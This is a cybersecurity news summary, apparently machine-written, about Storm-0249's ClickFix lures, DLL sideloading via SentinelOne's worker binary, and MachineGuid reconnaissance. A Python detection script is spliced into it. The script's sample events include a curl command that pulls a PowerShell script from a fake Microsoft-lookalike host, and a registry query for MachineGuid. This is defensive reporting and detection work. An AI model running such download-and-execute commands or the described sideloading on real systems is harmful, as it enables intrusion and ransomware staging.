

Ethical Hacking News

Storm-0249 Escalates Ransomware Attacks with ClickFix, Fileless PowerShell, and DLL Sideloading: A New Era of Stealthy Malware


A new threat actor known as Storm-0249 has escalated its ransomware attacks by adopting more advanced tactics, including ClickFix social engineering and DLL sideloading. By leveraging the trust associated with signed processes, the threat actor is able to execute malicious commands and establish persistent access to networks, making it essential for cybersecurity teams to stay vigilant and implement effective measures to prevent these attacks.

  • Storm-0249 has shifted its tactics to adopt more advanced methods for ransomware attacks.
  • The threat actor is using the ClickFix social engineering tactic to trick targets into running malicious commands via the Windows Run dialog.
  • Storm-0249 leverages trusted processes, such as SentinelOne's endpoint security solution, to execute malicious payloads with SYSTEM privileges.
  • The tactic allows Storm-0249 to bypass defenses and operate undetected by sideloading rogue DLLs and communicating with C2 servers.
  • Storm-0249 is using legitimate Windows utilities to extract system identifiers for future ransomware attacks.


    In a recent report from ReliaQuest, it has been revealed that the threat actor known as Storm-0249 has been shifting its tactics to adopt more advanced methods in order to facilitate ransomware attacks. The initial access broker, previously highlighted by Microsoft in September 2024, has now resorted to using the infamous ClickFix social engineering tactic to trick prospective targets into running malicious commands via the Windows Run dialog.

    According to ReliaQuest, Storm-0249 has been utilizing this tactic to leverage the trust associated with signed processes for added stealth. The target copies and executes a command that uses the legitimate "curl.exe" to fetch a PowerShell script from a URL that mimics a Microsoft domain. The script then executes a malicious MSI package with SYSTEM privileges, which drops a trojanized DLL associated with SentinelOne's endpoint security solution into the user's AppData folder, alongside the legitimate "SentinelAgentWorker.exe" executable.

    The idea behind this tactic is to sideload the rogue DLL when the "SentinelAgentWorker.exe" process is launched, thereby allowing the activity to stay undetected. The DLL then establishes encrypted communication with a command-and-control (C2) server, demonstrating a departure from mass phishing campaigns to precision attacks that weaponize the trust associated with signed processes for added stealth.

    ReliaQuest noted that this tactic allows Storm-0249 to bypass defenses, infiltrate networks, maintain persistence, and operate undetected. The use of living-off-the-land (LotL) tactics, coupled with the fact that these commands are run under the trusted "SentinelAgentWorker.exe" process, means that the activity is unlikely to raise any red flags.

    Additionally, Storm-0249 has been observed making use of legitimate Windows administrative utilities like reg.exe and findstr.exe to extract unique system identifiers like MachineGuid to lay the groundwork for follow-on ransomware attacks. This finding demonstrates a tactical shift on the part of the threat actor, as it moves away from traditional phishing campaigns and towards more sophisticated tactics.
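    The chain described above (a Run-dialog command that has curl.exe pull down a PowerShell script, the signed SentinelAgentWorker.exe running out of a user's AppData folder, and reg.exe/findstr.exe reading MachineGuid) gives a defender three concrete process-creation heuristics. The following is an added example, not code from ReliaQuest or the article: the events, hostnames and paths are constructed, and the only outside fact assumed is that MachineGuid lives under HKLM\SOFTWARE\Microsoft\Cryptography and that Run-dialog commands are spawned by explorer.exe.

```python
"""Process-creation heuristics for the Storm-0249 chain described above.
Added example; the events below are constructed, not real telemetry."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent: str   # parent process image path
    image: str    # created process image path
    cmdline: str  # full command line


def check_event(ev: ProcEvent) -> list[str]:
    """Return the names of every rule the event matches (empty if benign)."""
    parent, image, cmd = ev.parent.lower(), ev.image.lower(), ev.cmdline.lower()
    hits = []
    # Rule 1: ClickFix. A command pasted into the Run dialog is spawned by
    # explorer.exe; curl.exe fetching a .ps1 from the web in that context is
    # not normal interactive behaviour.
    if (parent.endswith("explorer.exe") and image.endswith("curl.exe")
            and re.search(r"https?://\S+\.ps1", cmd)):
        hits.append("clickfix_curl_script_download")
    # Rule 2: sideloading staging. The signed SentinelAgentWorker.exe has no
    # business running out of a user's AppData tree.
    if image.endswith("sentinelagentworker.exe") and "\\appdata\\" in image:
        hits.append("sentinel_worker_from_appdata")
    # Rule 3: reconnaissance. reg.exe / findstr.exe touching MachineGuid
    # (stored under HKLM\SOFTWARE\Microsoft\Cryptography).
    if (image.endswith(("reg.exe", "findstr.exe"))
            and ("machineguid" in cmd or "software\\microsoft\\cryptography" in cmd)):
        hits.append("machineguid_collection")
    return hits


def scan(events: list[ProcEvent]) -> list[tuple[int, str]]:
    """Run every rule over a batch of events; returns (event index, rule) pairs."""
    return [(i, rule) for i, ev in enumerate(events) for rule in check_event(ev)]


# Constructed sample telemetry; hostnames and paths are placeholders.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\curl.exe",
              r"curl.exe https://update.microsoft-support.example/fix.ps1 -o %TEMP%\fix.ps1"),
    ProcEvent(r"C:\Windows\System32\msiexec.exe",
              r"C:\Users\alice\AppData\Local\Temp\SentinelAgentWorker.exe", "SentinelAgentWorker.exe"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\reg.exe",
              r'reg query "HKLM\SOFTWARE\Microsoft\Cryptography" /v MachineGuid'),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", "notepad.exe"),
    ProcEvent(r"C:\Windows\System32\services.exe",
              r"C:\Program Files\SentinelOne\SentinelAgentWorker.exe", "SentinelAgentWorker.exe"),
]

if __name__ == "__main__":
    for idx, rule in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```

The two benign events (Notepad from the Run dialog, the agent worker from Program Files) produce no hits, which is the check that keeps Rule 1 and Rule 2 from firing on ordinary use of the same binaries.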

    The end goal of these infections is to obtain persistent access to various enterprise networks and monetize them by selling them to ransomware gangs, providing them with a ready supply of targets, and accelerating the pace of such attacks. As ReliaQuest stated, "This isn't just generic reconnaissance – it's preparation for ransomware affiliates." By tying encryption keys to MachineGuid, attackers ensure that even if defenders capture the ransomware binary or attempt to reverse-engineer the encryption algorithm, they cannot decrypt files without the attacker-controlled key.

    The findings from ReliaQuest demonstrate a new era of stealthy malware, as Storm-0249 continues to evolve its tactics in order to evade detection. As cybersecurity teams adapt to these emerging threats, it is essential that they stay vigilant and implement effective measures to prevent such attacks from compromising their networks.



    Related Information:
  • https://www.ethicalhackingnews.com/articles/-Storm-0249-Escalates-Ransomware-Attacks-with-ClickFix-Fileless-PowerShell-and-DLL-Sideloading-A-New-Era-of-Stealthy-Malware--ehn.shtml

  • https://thehackernews.com/2025/12/storm-0249-escalates-ransomware-attacks.html

  • https://reliaquest.com/blog/threat-spotlight-storm-0249-precision-endpoint-exploitation/


  • Published: Tue Dec 9 08:43:27 2025 by llama3.2 3B Q4_K_M
    © Ethical Hacking News. All rights reserved.